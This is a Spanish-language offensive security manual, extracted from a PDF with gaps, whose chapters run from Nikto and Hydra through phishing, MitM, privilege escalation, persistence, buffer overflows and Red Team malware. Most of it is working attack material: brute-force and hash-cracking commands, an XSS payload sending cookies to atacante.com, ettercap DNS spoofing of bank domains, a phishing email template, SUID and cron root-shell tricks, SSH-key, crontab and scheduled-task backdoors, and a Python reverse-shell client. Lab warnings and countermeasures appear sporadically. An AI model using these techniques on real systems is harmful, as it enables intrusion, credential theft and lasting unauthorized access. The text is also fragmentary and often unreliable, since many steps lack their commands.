nikto -h https://victima.com
● Especificar puerto:
nikto -h http://192.168.56.101 -p 8080
Nikto detecta:
● /phpinfo.php expuesto.
● Directorio /admin/ accesible.
● Apache desactualizado vulnerable a DoS.
Sin un solo exploit, ya tenemos un mapa de debilidades.
Escaneo de directorios:
wfuzz -u http://192.168.56.101/FUZZ -w
/usr/share/wordlists/dirb/common.txt
wfuzz -u "http://192.168.56.101/login.php?user=FUZZ&pass=1234" -w
users.txt
59
Ejemplo narrativo:
Ahora el atacante sabe dónde atacar y con qué nombres probar credenciales.
Un Red Teamer profesional los usa en conjunto: Nikto para olfatear debilidades ya
registradas, Wfuzz para rascar hasta encontrar lo oculto.
Advertencias negrísimas
● Nikto es ruidoso. Un IDS/IPS lo detecta fácilmente. Úsalo solo en laboratorio o con
autorización.
● Wfuzz puede generar miles de peticiones. Esto puede tumbar aplicaciones débiles.
● Nunca lances estos escaneos en sitios de terceros sin permiso. Es ilegal y
rastreable.
60
Mini laboratorio práctico
Objetivo: encontrar directorios y vulnerabilidades en DVWA con Nikto y Wfuzz.
1. Ejecutar Nikto:
nikto -h http://192.168.56.101/dvwa/
2. Ejecutar Wfuzz:
wfuzz -u http://192.168.56.101/dvwa/FUZZ -w
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404
Conclusión
Nikto y Wfuzz son los sabuesos del Red Team: uno rastrea vulnerabilidades conocidas, el otro
cava hasta descubrir lo que está escondido. Juntos, convierten una aplicación web en un campo
de cacería donde cada archivo olvidado, cada directorio mal protegido y cada usuario válido se
convierte en una presa fácil.
En el camino negrísimo, dominar estos sabuesos significa oler el miedo en los servidores y
usarlo para abrir puertas que el administrador creía cerradas.
Capítulo 17
En el mundo del Red Team, hay herramientas de precisión y hay armas de demolición. Hydra
(THC-Hydra) es esto último: el martillo del hacker, diseñado para golpear de manera repetitiva
y despiadada hasta romper la cerradura más frágil.
61
Si Nikto y Wfuzz son sabuesos que huelen vulnerabilidades, Hydra es el verdugo incansable
que prueba miles de combinaciones hasta desgarrar la debilidad más común de cualquier
sistema: las contraseñas humanas.
Los administradores aún confían en claves como 123456, admin, qwerty. Hydra existe para
recordarles lo estúpido de esa confianza.
Hydra en acción
Hydra soporta una amplia variedad de protocolos: SSH, FTP, HTTP, RDP, MySQL, SMB,
POP3, Telnet, LDAP, VNC, entre otros.
Sintaxis básica
62
hydra -l admin -P rockyou.txt 192.168.56.101 http-post-form
"/login.php:user=^USER^&pass=^PASS^:F=Login Failed"
Ataques letales en redes corporativas donde muchos aún usan credenciales por defecto.
Estrategias avanzadas
● Ataque con múltiples hilos (threads):
hydra -l admin -P lista.txt -t 8 192.168.56.101 ssh
● Uso en ataques distribuidos: Hydra puede combinarse con scripts para repartir
intentos entre múltiples máquinas (un pequeño botnet de laboratorio).
63
4. Con estas credenciales, el atacante accede a la red interna y empieza movimiento
lateral.
Una contraseña débil convierte un bastión en un castillo de arena.
Advertencias negrísimas
● Hydra es ruidoso. Cada intento queda registrado en los logs de la víctima.
● Los sistemas con bloqueos de cuenta tras N intentos detectan y detienen ataques
brutos.
● El uso irresponsable en redes ajenas es ilegal y rastreable.
1. Arranca Metasploitable 2.
2. Descubre que el puerto 21 (FTP) está abierto con Nmap.
Lanza Hydra contra FTP:
hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt 192.168.56.101
ftp
3.
4. Si la clave está en el diccionario, Hydra la revelará.
En minutos habrás visto cómo el martillo de Hydra rompe la seguridad más débil: la
contraseña humana.
Conclusión
Hydra es el recordatorio cruel de que la seguridad muere en la contraseña más débil. Un
firewall de millones de dólares no sirve de nada si el usuario escribe 123456.
El Red Teamer que domina Hydra sabe que, cuando todo lo demás falla, la fuerza bruta siempre
es un recurso válido: lento, despiadado y efectivo. Hydra no piensa, no descansa, no razona.
Solo golpea hasta que la cerradura se rompe.
En el camino negrísimo, Hydra es el martillo del Red Team, y cada golpe resuena como un
aviso a los administradores descuidados: “Tus contraseñas no son tuyas, son mías.”
Capítulo 18
64
John the Ripper: cracking de contraseñas a nivel
infernal
Si Hydra es el martillo que golpea puertas con fuerza bruta, John the Ripper es el verdugo
silencioso que descifra llaves robadas en la penumbra. Mientras Hydra necesita un servicio
expuesto para intentar contraseñas, John se alimenta de hashes extraídos de sistemas: los
convierte en carne, desgarrando el secreto que los administradores juraban inviolable.
● /etc/shadow en Linux.
● SAM (Security Account Manager) en Windows
(C:\Windows\System32\config\SAM).
● Archivos de bases de datos, dumps de Active Directory o volcados de memoria.
Ejemplo de hash SHA-512 de Linux:
$6$randomsalt$uFuqZqQ7.jk5Vvu7nZkNwQIBUOjw0iZpS2vko2YzyHykT3...
aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
Instalación de John
En Kali Linux ya viene preinstalado:
65
Versión alternativa (más poderosa): Jumbo John, que incluye más formatos y optimizaciones:
1. Ataque de diccionario
John genera todas las combinaciones posibles. Letal, pero extremadamente lento.
Ejemplos prácticos
66
Preparar con unshadow:
unshadow /etc/passwd /etc/shadow > hashes.txt
2.
Crackear con John:
john --wordlist=rockyou.txt hashes.txt
3.
Estrategias avanzadas
● Combinar Hydra y John:
○ Hydra para intentar contraseñas débiles en vivo.
○ John para descifrar hashes robados sin límite de intentos.
● Uso de reglas personalizadas: El archivo john.conf permite reglas de mutación
como añadir sufijos, mayúsculas o símbolos.
Ataques híbridos: Combinar diccionario + incremental:
john --wordlist=rockyou.txt --rules --incremental hashes.txt
●
Escenario narrativo
Un Red Team obtiene acceso a un servidor con permisos bajos. Logra descargar
/etc/shadow.
En minutos, revela:
root:password1
sysadmin:qwerty123
●
● Con estas claves, el acceso se eleva a root y, más tarde, abre puertas a toda la red
corporativa.
Hydra habría tardado horas en intentarlo en vivo. John, en silencio, las descifró en minutos.
67
Advertencias infernales
● John no inventa magia: si la contraseña es larga, única y con caracteres complejos,
puede resistir años de cómputo.
● El cracking es intensivo en CPU/GPU y puede sobrecalentar equipos mal preparados.
● Usar John fuera de entornos controlados es ilegal.
Conclusión
John the Ripper es el verdugo en las sombras. No golpea puertas como Hydra: roba las
llaves en silencio y las descifra con paciencia demoníaca. Cada hash roto es un recordatorio: la
fortaleza de un sistema no depende de firewalls ni IDS, sino de la debilidad humana al elegir
contraseñas previsibles.
En el camino del Red Team, Hydra y John son las dos caras de la misma moneda:
Capítulo 19
Antes de atacar un castillo, el ejército observa sus murallas, cuenta centinelas y estudia rutas de
escape. En el hacking, esa labor de exploración inicial se llama OSINT (Open Source
Intelligence). Aquí es donde aparece theHarvester, una herramienta diseñada para recolectar
direcciones de correo, dominios, subdominios, nombres de hosts, y hasta datos de empleados
en la red.
¿Qué es theHarvester?
Es una herramienta de reconocimiento pasivo y activo escrita en Python, pensada para
recopilar información de fuentes abiertas. Permite al atacante:
68
En la etapa de footprinting, theHarvester es la guadaña que corta información expuesta sin
necesidad de levantar sospechas.
Instalación
En Kali Linux, viene preinstalado:
Uso básico
Sintaxis general:
Parámetros clave:
Ejemplos prácticos
69
Descubre subdominios ocultos: vpn.target.com, mail.target.com, etc.
Integraciones avanzadas
theHarvester no es un recolector solitario. Puede unirse con otras piezas del arsenal:
● Con Maltego → para visualizar gráficamente las relaciones entre correos, subdominios y
hosts.
● Con Recon-ng → para ampliar bases de datos y pivotear hacia ataques más
específicos.
● Con Burp Suite → alimentar proxies con subdominios descubiertos.
Escenario narrativo
Un Red Team ataca a una empresa de telecomunicaciones.
Riesgos y consideraciones
70
● Algunos motores de búsqueda bloquean o limitan consultas automáticas → usar proxys o
tiempos de espera.
● Mucha de la información obtenida puede ser falsa o desactualizada → siempre validar
con técnicas adicionales.
● Usar esta herramienta contra objetivos sin autorización es ilegal.
Conclusión
theHarvester es la hoz digital que corta la superficie de internet para revelar lo oculto. Un
hacker sin información es un ciego en la batalla. Con theHarvester, el Red Team obtiene una
ventaja táctica: conocer qué usuarios existen, qué puertas ocultas esperan ser tocadas y qué
servicios duermen bajo la superficie.
En el juego del espionaje digital, cada correo recolectado es una bala cargada en la
recámara del ataque.
Capítulo 20
El aire es un campo de batalla invisible. Los paquetes flotan como susurros en la noche:
contraseñas, credenciales, conversaciones cifradas. El hacker que domina Aircrack-NG es un
vampiro del espectro Wi-Fi, capaz de chupar hasta la última gota de datos que viajan entre el
router y sus víctimas.
En el Red Team, esta herramienta es esencial para ataques sobre redes inalámbricas, ya sea
en auditorías corporativas, pruebas de intrusión físicas o ejercicios de simulación de intrusos.
¿Qué es Aircrack-NG?
Es una suite de herramientas para auditar redes Wi-Fi. Sus funciones incluyen:
71
Preparación del terreno
Antes de empezar, necesitas:
● Una tarjeta Wi-Fi compatible con modo monitor e inyección (ej: Alfa AWUS036NHA).
● Drivers instalados en Kali Linux.
● Una lista de contraseñas para ataques de diccionario (rockyou.txt, por ejemplo).
airodump-ng wlan0mon
● Red: “OficinaSecure”
● Canal: 6
● BSSID: 9C:D2:1E:4A:22:91
3. Capturar el handshake
72
aireplay-ng -0 5 -a 9C:D2:1E:4A:22:91 wlan0mon
5. Crackear la contraseña
Ejemplo narrativo
En un ataque Red Team contra una empresa:
Consideraciones y ética
● Capturar handshakes no es ilegal en sí. Lo ilegal es intentar descifrarlos sin
autorización.
● Aircrack-NG se usa en auditorías para demostrar lo frágiles que pueden ser las
contraseñas Wi-Fi.
● Las contraseñas débiles (ej: 12345678, qwerty2023) siguen cayendo en segundos.
73
Conclusión
El hacker que domina Aircrack-NG tiene control del aire. Puede escuchar, desangrar y
finalmente arrodillar a una red inalámbrica. El aire, que parece intangible, se convierte en un río
de datos listos para ser drenados.
Aircrack-NG es el colmillo que muerde el espectro Wi-Fi. Cada handshake es una vena abierta.
Capítulo 21
En la guerra digital, no todas las batallas se ganan con exploits. A veces, la herramienta más
devastadora no es el 0-day, sino la palabra. El phishing es el arte de disfrazarse, de tejer
trampas que cazan a la víctima no por vulnerabilidad técnica, sino por debilidad humana. En el
Red Team, el phishing no es opcional: es un arma imprescindible, capaz de abrir puertas que
ningún exploit podría forzar.
74
● Diseña un correo con lenguaje específico.
● Se hace pasar por un jefe, proveedor o área de IT.
● Adjunta un enlace o documento malicioso (payload: macro en Word, PDF con exploit,
enlace a un servidor clonado).
Ejemplo:
De: [email protected]
Asunto: Acción requerida – Actualización de seguridad
Hola, [Nombre],
Hemos detectado un acceso sospechoso en tu cuenta. Para continuar
usando tu correo, confirma tus credenciales aquí: https://soporte-
empresa.com/login
./gophish
● Plantillas de correos.
● URLs de captura.
● Estadísticas de apertura y clics.
Con un clic, miles de correos salen disparados. Incluso si solo el 2% cae, ya hay decenas de
credenciales robadas.
Herramientas comunes
● SET (Social Engineering Toolkit): clonado de sitios, payloads incrustados.
● Gophish: campañas masivas con métricas.
● Evilginx2: proxys inversos para robar sesiones y tokens MFA.
● King Phisher: para escenarios avanzados de Red Team.
75
Flujo de ataque (ejemplo práctico)
1. Recolectar info (OSINT):
○ Cargo de la víctima, correo real, proveedores usados.
Contramedidas
● Concienciación constante: entrenamientos con simulaciones.
● Filtros de correo avanzados (SPF, DKIM, DMARC).
● MFA: aunque roben la contraseña, no logran acceso.
● Revisar URLs antes de hacer clic.
Conclusión
El phishing es el filo invisible de la daga hacker. Una técnica que no necesita exploits, solo
ingenio y paciencia. El phishing artesanal es el francotirador que dispara un único proyectil
letal. El phishing masivo es la lluvia de flechas: caótica, pero capaz de diezmar multitudes.
Un Red Teamer que no domina esta disciplina es un guerrero sin máscara. Y en la oscuridad del
ciberespacio, la máscara lo es todo.
76
Capítulo 22
Para el Red Team, dominar la ingeniería social es comprender que los humanos son el
sistema operativo más vulnerable.
♂ Técnicas de campo
● Pretexting (pretextos): inventar una historia creíble para justificar la interacción.
Ejemplo: “Soy auditor externo, necesito confirmar accesos.”
● Vishing (voice phishing): llamadas telefónicas manipuladoras.
77
● Smishing (SMS phishing): mensajes cortos con enlaces maliciosos.
● Tailgating: seguir físicamente a alguien para entrar a una oficina.
● Impersonation: suplantar identidad de proveedores, clientes o compañeros de trabajo.
Contramedidas
● Capacitación constante: simulaciones de phishing, role play de llamadas falsas.
● Políticas claras: ningún empleado de IT debe pedir credenciales por teléfono o correo.
● Verificación en dos pasos: confirmar identidades antes de compartir información.
● Cultura de desconfianza saludable: enseñar a cuestionar.
Conclusión
La ingeniería social es la daga invisible del hacker. Mientras que un exploit técnico puede fallar,
la manipulación psicológica se adapta, aprende y seduce. Un Red Teamer debe entender no
solo sistemas, sino emociones.
En el tablero de la guerra digital, el adversario más peligroso no es el que domina 1000 exploits,
sino el que entiende cómo hacer que su enemigo se rinda sin luchar.
78
Capítulo 23
La premisa es simple: te colocas en medio de la comunicación entre dos partes que confían
entre sí. El usuario piensa que habla con el servidor, el servidor piensa que habla con el
usuario… y en realidad ambos hablan contigo.
Herramienta 1: Ettercap
Ettercap es el clásico indiscutido del MitM. Funciona en modo consola o gráfico, y permite
realizar ARP poisoning y sniffing avanzado.
# Escuchar interfaces
ifconfig
Sniffing de contraseñas:
79
ettercap -Tq -i wlan0 -M arp /192.168.1.10/ /192.168.1.1/
Con plugins activos, Ettercap captura usuarios y contraseñas en claro (HTTP, FTP, Telnet,
POP3).
Este comando:
80
1. Escaneo inicial con Nmap para identificar IPs vivas.
2. ARP spoofing con Ettercap.
3. MITMf inyectando JS malicioso.
4. Víctima accede a un sitio HTTP → se carga script keylogger.
5. Credenciales capturadas en tiempo real en consola del atacante.
Contramedidas
● ARP Inspection en switches administrables.
● TLS everywhere (evitar HTTP plano).
● HSTS (HTTP Strict Transport Security) para bloquear SSL Strip.
● IDS/IPS que detecten patrones de ARP poisoning.
● Educación: evitar redes Wi-Fi públicas sin VPN.
Conclusión
Ettercap representa el filo clásico de la navaja, MITMf la versión futurista cargada de veneno.
Con estas armas, el Red Team puede escuchar susurros digitales, robar secretos y manipular
realidades.
El hacker ético debe dominarlas no para abusar de ellas, sino para anticipar al adversario que sí
lo hará. En la arena del cibercrimen, quien controla el tráfico controla el poder.
Capítulo 24
81
ARP Spoofing: la mentira en la capa 2
El atacante envenena las tablas ARP de la víctima y del gateway, convenciéndolos de que su
máquina es el intermediario válido. Resultado: todo el tráfico fluye a través del atacante.
Explicación:
El tráfico ahora pasa por el atacante, quien puede sniffear credenciales, manipular tráfico o
lanzar ataques de inyección.
Esto no solo intercepta, también permite cargar plugins como sslstrip, dns_spoof o inyectar
scripts maliciosos.
Si el ARP es un ataque contra las direcciones en la red local, el DNS es contra la brújula que
guía a los usuarios en Internet. El atacante engaña al resolver DNS para redirigir dominios
legítimos a IPs falsas.
Ejemplo:
82
Ejemplo práctico con Ettercap + dns_spoof
Editar el archivo de configuración:
nano /etc/ettercap/etter.dns
1.
Agregar redirecciones maliciosas:
www.banco.com A 192.168.1.66
*.facebook.com A 192.168.1.66
2.
Lanzar ataque:
ettercap -T -q -M arp /192.168.1.10/ /192.168.1.1/ -P dns_spoof
3.
La víctima, al visitar www.banco.com, termina en el servidor trampa del atacante, donde corre
un clon con credenciales robadas en vivo.
Entorno:
83
Contramedidas
Conclusión
El ARP Spoofing es el engaño en la base de la red local, mientras que el DNS Spoofing es el
engaño en la brújula de Internet. Combinados, son la pareja letal que permite al atacante
redirigir el mundo digital de la víctima hacia sus trampas.
Un Red Team debe dominarlos para demostrar la fragilidad de las redes corporativas y forzar a
que se implementen defensas sólidas. Quien controla el ARP y el DNS, controla la realidad
digital del enemigo.
Capítulo 25
Mientras los escaneos y exploits abren puertas, el harvesting roba las llaves directamente del
llavero.
● Persistencia sobre ruido: un exploit puede generar alertas, pero una credencial real
abre puertas sin sospechas.
● Movilidad lateral: con una sola cuenta comprometida, es posible pivotear dentro de una
red entera.
● Evasión de defensas: contraseñas robadas permiten autenticación legítima, invisible
para IDS/IPS.
84
Herramientas clásicas y modernas
Ejemplo:
Salida típica:
Username : Administrator
Domain : CORP
Password : P@ssw0rd123
2. LaZagne – Multiplataforma
Script en Python que extrae credenciales almacenadas en aplicaciones: navegadores, Wi-Fi,
clientes de correo, etc.
Permite obtener:
● Contraseñas de Chrome/Firefox.
● Claves Wi-Fi guardadas.
● Credenciales de clientes SSH.
responder -I eth0
Cuando una víctima busca un recurso inexistente en la red, Responder “se hace pasar” por el
servidor y roba el hash de autenticación.
Luego, ese hash puede ser crackeado con John the Ripper o Hashcat.
85
4. Evilginx2 – Phishing avanzado con bypass 2FA
Un framework que actúa como reverse proxy, capturando credenciales y cookies de sesión en
ataques de phishing.
Ejemplo básico:
evilginx -p phishlets/office365.yaml
● Usuario y contraseña.
● Token de sesión.
● Posibilidad de saltarse incluso MFA/2FA.
Ejemplo Empire:
usemodule credentials/mimikatz/logonpasswords
execute
Contramedidas recomendadas
86
● Desactivar LLMNR y NetBIOS en redes Windows.
● Implementar Credential Guard en Windows 10+.
● Evitar almacenamiento de contraseñas en navegadores sin cifrado.
● Usar MFA robusto, preferiblemente con hardware tokens (YubiKey).
● Monitorear ejecución de Mimikatz y herramientas similares con EDR.
Conclusión
El Credential Harvesting es el lado más sutil pero devastador del hacking: sin explotar
vulnerabilidades, sin lanzar ataques ruidosos, el atacante se convierte en administrador
simplemente robando credenciales.
Para el Red Team es un paso esencial en la cadena de ataque. Para la defensa, representa el
escenario más difícil de detectar.
Capítulo 26
Si las credenciales son el oro de la red, las aplicaciones web son las puertas de la ciudad. La
mayoría de las organizaciones viven y respiran en la web: portales de clientes, intranets, APIs,
paneles administrativos. Atacar esas puertas y encontrar grietas en sus cimientos es el trabajo
más clásico del Red Team.
Dos de las vulnerabilidades más comunes —y a la vez más devastadoras— son el Cross-Site
Scripting (XSS) y la SQL Injection (SQLi). Pese a ser viejas conocidas, siguen apareciendo
cada año en el OWASP Top 10, demostrando que los desarrolladores y las empresas todavía
pecan en su implementación.
87
Cross-Site Scripting (XSS)
El XSS ocurre cuando un atacante inyecta código JavaScript malicioso en una aplicación web
para que sea ejecutado en el navegador de otros usuarios.
Tipos principales
Reflejado: Se ejecuta cuando la víctima accede a un enlace manipulado. Ejemplo URL:
http://victima.com/search?q=<script>alert('Pwned')</script>
1.
Almacenado: El payload queda guardado en la base de datos y afecta a todo el que cargue la
página. Ejemplo: un comentario con código malicioso:
<script>document.location='http://atacante.com/cookie?c='+document.cook
ie</script>
2.
DOM-based: Ocurre directamente en el navegador por una manipulación del DOM. Ejemplo:
var user = location.hash.substring(1);
document.write(user);
Al abrir:
http://victima.com/#<img src=x onerror=alert(1)>
3. → Ejecuta código arbitrario.
La SQLi consiste en inyectar código malicioso en consultas SQL para manipular la base de
datos. Es uno de los ataques más rentables porque suele dar acceso a: usuarios, contraseñas,
información financiera, etc.
Ejemplo clásico
SELECT * FROM users WHERE username = 'admin' AND password = '1234';
Usuario: admin' --
Contraseña: (cualquier cosa)
88
La consulta se transforma en:
Esto fuerza a la aplicación a devolver credenciales junto con los resultados originales.
Herramientas clave
sqlmap – Automatiza la detección y explotación de SQLi. Ejemplo:
sqlmap -u "http://victima.com/product.php?id=1" --dbs
● → Devuelve todas las bases de datos disponibles.
● Burp Suite Repeater – Prueba manual de payloads.
● Havij (clásico) – Aunque obsoleto, fue un referente.
Usa sqlmap:
sqlmap -u "http://victima.com/item.php?id=1" --dump -D users -T cuentas
89
2.
3. Resultado: obtiene una tabla completa de usuarios y contraseñas cifradas.
4. Las pasa a John the Ripper para descifrarlas.
Contramedidas defensivas
Conclusión
XSS y SQLi son las “viejas glorias” de la explotación web, pero nunca han dejado de ser
relevantes. Siguen generando brechas millonarias y son la entrada favorita de atacantes que
buscan robar información, tomar sesiones y manipular aplicaciones críticas.
Un Red Team que no domine estas técnicas no está completo; y un Blue Team que no las
prevenga está condenado a repetir la historia.
Capítulo 27
Cuando logras una intrusión en un sistema Linux, muchas veces no entras como root. La
primera shell suele ser limitada, con permisos reducidos y sin acceso a la joya de la corona. El
verdadero arte comienza después: convertir una shell básica en un trono de superusuario.
La escalada de privilegios es el puente entre el simple acceso y el dominio total de un objetivo.
● Nunca te conformes con ser un usuario común. Un Red Teamer furioso busca
siempre el máximo control.
● Cada error de configuración es una puerta abierta. Los administradores perezosos
son tu mejor aliado.
90
● Piensa como root, actúa como un ninja. Haz el menor ruido posible mientras te abres
camino.
1. Kernel exploits
Aprovechan vulnerabilidades en versiones antiguas del kernel. Ejemplo: Dirty COW (CVE-2016-
5195), que permitía escribir en memoria de solo lectura.
/usr/bin/vim
Puedes invocarlo:
vim -c ':!sh'
91
3. Abuso de sudoers
Si un usuario puede ejecutar comandos sin contraseña:
sudo -l
Ejemplo:
Ejecuta:
→ Shell privilegiada.
4. Capabilities en binarios
Linux permite asignar capacidades específicas sin dar permisos root completos. Mal
configuradas, son una mina de oro.
getcap -r / 2>/dev/null
Ejemplo:
/usr/bin/python3 = cap_setuid+ep
→ Ejecutar:
Root inmediato.
cat /etc/crontab
Ejemplo vulnerable:
92
* * * * * root /usr/local/bin/backup.sh
Si backup.sh es modificable:
Herramientas indispensables
Escenario práctico
Edita clean.sh:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
3.
4. Espera la ejecución del cron.
Lanza:
/tmp/rootbash -p
5.
93
6. Resultado: shell root.
Contramedidas defensivas
Conclusión
Escalar privilegios en Linux es como encontrar la llave maestra del castillo. Una vez alcanzado
el nivel root, no hay vuelta atrás: el atacante puede robar, borrar, modificar o instalar lo que
quiera. Para el Red Team, es el objetivo final en cada intrusión; para el Blue Team, es la
pesadilla que debe evitarse a toda costa.
Capítulo 28
Si Linux es un castillo medieval lleno de trampas, Windows es un rascacielos con mil accesos
ocultos, ascensores secretos y llaves maestras desperdigadas. En el mundo del Red Team,
comprometer una máquina Windows como usuario estándar es apenas el inicio. El verdadero
poder llega al transformarte en Administrador o, mejor aún, en SYSTEM, la deidad intocable
del sistema operativo.
94
Tipos de escalada de privilegios en Windows
Windows, al igual que Linux, sufre vulnerabilidades críticas en el kernel. Ejemplo: MS16-032 →
permitía elevar privilegios en Windows 7/8/Server 2012.
Herramientas:
2. UAC Bypass
El User Account Control (UAC) debería impedir escaladas fáciles, pero existen bypass
conocidos. Ejemplo con PowerShell:
Existen técnicas para abusar de binarios firmados por Microsoft y ejecutarlos como
Administrador sin prompts.
3. Abuso de servicios
Muchos servicios en Windows corren con privilegios elevados. Si un servicio carga un ejecutable
desde una ruta modificable por el usuario → escalada inmediata.
Comandos útiles:
sc qc nombre_servicio
95
sc config nombre_servicio binpath= "C:\Users\hacker\payload.exe"
Ejemplo:
Escenario práctico
96
PrintSpoofer.exe -i -c cmd
Herramientas esenciales
Contramedidas defensivas
Conclusión
Capítulo 29
97
Conseguir acceso es un logro, escalar privilegios es gloria, pero nada de eso sirve si al reiniciar
el sistema o detectar tu shell, tu presencia se desvanece como humo. Aquí entra la
persistencia: el arte oscuro de permanecer oculto, asegurando que la víctima nunca pueda
expulsarte del todo.
● “Un acceso efímero no vale nada”: sin persistencia, todo esfuerzo se pierde.
● “La mejor puerta trasera es la que no ves”: invisibilidad sobre sofisticación.
● “Diversificar es poder”: usar varios métodos simultáneamente asegura que, aunque
detecten uno, otros sigan vivos.
Ejemplo:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC..." >>
~/.ssh/authorized_keys
○
○ Resultado: acceso perpetuo por SSH sin contraseñas.
2. Cron jobs ocultos
○ Crear tareas automáticas que ejecuten tu payload.
Ejemplo:
echo "*/10 * * * * /tmp/.hidden/payload.sh" >> /etc/crontab
○
3. Servicios persistentes
○ Crear un servicio con systemd.
Ejemplo:
[Unit]
Description=UpdateService
[Service]
ExecStart=/usr/local/bin/.update
[Install]
WantedBy=multi-user.target
○
○ Luego: systemctl enable UpdateService.
4. LD_PRELOAD
98
○ Manipulación de librerías dinámicas para cargar código malicioso en procesos
legítimos.
Herramientas de persistencia
99
1. El atacante compromete un Windows 10 como SYSTEM.
Instala un Scheduled Task cada 10 minutos para lanzar un reverse shell.
schtasks /create /sc minute /mo 10 /tn Backdoor /tr
"C:\Users\Public\shell.exe"
2.
3. Paralelamente, modifica Run en el registro para otro payload.
4. El admin detecta uno de los métodos, pero al reiniciar, el otro revive al atacante.
Contramedidas defensivas
Conclusión
Capítulo 30
Conseguir acceso a una máquina en la red corporativa es apenas el inicio. El verdadero poder
surge cuando logramos movernos lateralmente y usar esa máquina comprometida como un
puente hacia sistemas más profundos y protegidos. Este arte oscuro se llama pivoting:
convertir un host intermedio en trampolín.
Junto al pivoting, aparecen los túneles: canales invisibles para atravesar firewalls, IDS/IPS y
segmentaciones que deberían proteger la infraestructura. Si persistencia era la llave para
quedarte, el pivoting es el mapa que abre todas las puertas internas.
100
● “Un punto de acceso es nada, un pasaje secreto es todo”.
● “El firewall no es una muralla, es un decorado”.
● “Cada host puede ser un trampolín hacia el próximo objetivo”.
101
Túneles oscuros: evadir perímetros
● DNS Tunneling
○ Encapsular tráfico en consultas DNS.
○ Herramientas: iodine, dnscat2.
Ejemplo:
./dnscat --dns domain.com
○
● ICMP Tunneling
○ Uso de paquetes ping para enviar datos.
○ Herramienta: ptunnel-ng.
● HTTP/HTTPS Tunneling
○ Encapsular shell en tráfico web legítimo.
○ Herramientas: reGeorg, hts, cobalt strike beacon.
● VPN maliciosa
○ Configurar OpenVPN sobre el host comprometido para integrar directamente la
red interna.
Contramedidas defensivas
102
Conclusión
Pivoting y tunneling son técnicas que convierten una intrusión local en un imperio digital.
Donde la segmentación pretende proteger, el hacker levanta puentes secretos. Si persistencia
es el arte de permanecer, pivoting es el arte de expandirse sin límites.
Capítulo 31
El buffer overflow es un clásico inmortal. Aunque muchos lo consideran un arte antiguo, sigue
siendo una de las técnicas más estudiadas y una base obligatoria para comprender la
explotación moderna. El concepto es simple: cuando un programa escribe más datos de los
que un buffer puede contener, la memoria adyacente se sobrescribe. Pero el verdadero
poder está en controlar qué se sobrescribe: registros, direcciones de retorno, punteros a
funciones.
Conceptos fundamentales
Ejemplo en C vulnerable
#include <stdio.h>
#include <string.h>
103
strcpy(buffer, input); // Sin comprobación de límites
printf("Input recibido: %s\n", buffer);
}
1. Crash inicial
○ Enviar una cadena larga para provocar un fallo.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
<EIP>
4.
5. Control de EIP
○ Confirmar que se puede reescribir el registro con una dirección controlada.
6. Colocación de shellcode
○ Inyectar código (reverse shell, bind shell).
○ Ejemplo:
shellcode = b""
shellcode += b"\xdb\xd7\xd9\x74\x24\xf4..." # reverse TCP
7.
8. NOP sled
○ Zona de bytes \x90 para aumentar probabilidad de ejecutar el shellcode.
9. Payload final
○ Construcción: offset + dirección de salto + NOP sled +
shellcode.
104
Ejemplo en Python (exploit)
#!/usr/bin/python3
import sys
print(payload)
105
4. Crear exploit en Python paso a paso (fuzzing → offset → control de EIP → shellcode).
5. Lograr un reverse shell en la máquina víctima.
Conclusión
Capítulo 32
El malware en el contexto del Red Team no es un fin en sí mismo, sino una herramienta
controlada que emula el arsenal del atacante real. Su objetivo no es destruir, sino enseñar,
evaluar y medir la capacidad de detección y respuesta de un equipo defensivo (Blue Team /
SOC).
Mientras que el “malware salvaje” busca robar dinero, datos o interrumpir operaciones, el
malware de Red Team se construye bajo estrictos parámetros éticos y legales,
documentando cada paso y con el consentimiento del cliente o la organización.
106
○ Ejemplo: crear un servicio en Windows que se ejecuta tras cada reinicio.
3. Droppers y loaders
○ Programas pequeños cuya función es descargar o desplegar la carga maliciosa
real.
○ Utilizados para evadir controles iniciales.
4. Keyloggers
○ Herramientas de prueba para verificar si la seguridad detecta exfiltración de
credenciales.
5. Beaconing implants (C2)
○ Software que establece conexión con un servidor de mando y control (C2).
○ Ejemplo: Cobalt Strike beacon o implantes creados con frameworks como
Empire.
● Cobalt Strike: estándar comercial para crear beacons, payloads y simular APTs.
● Sliver C2: alternativa open source, ligera y flexible.
● Metasploit payloads: implantes básicos para PoCs.
● Empire: framework de post-explotación que permite crear agentes en PowerShell o
Python.
Nota: este ejemplo es meramente educativo. No debe ser usado fuera de un entorno de
laboratorio controlado.
import socket
import subprocess
import os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
while True:
command = s.recv(1024).decode()
if command.lower() == "exit":
break
if command.startswith("cd "):
try:
107
os.chdir(command.strip("cd "))
s.send(b"Directorio cambiado\n")
except:
s.send(b"Error al cambiar directorio\n")
else:
output = subprocess.getoutput(command)
s.send(output.encode())
s.close()
Técnicas de evasión
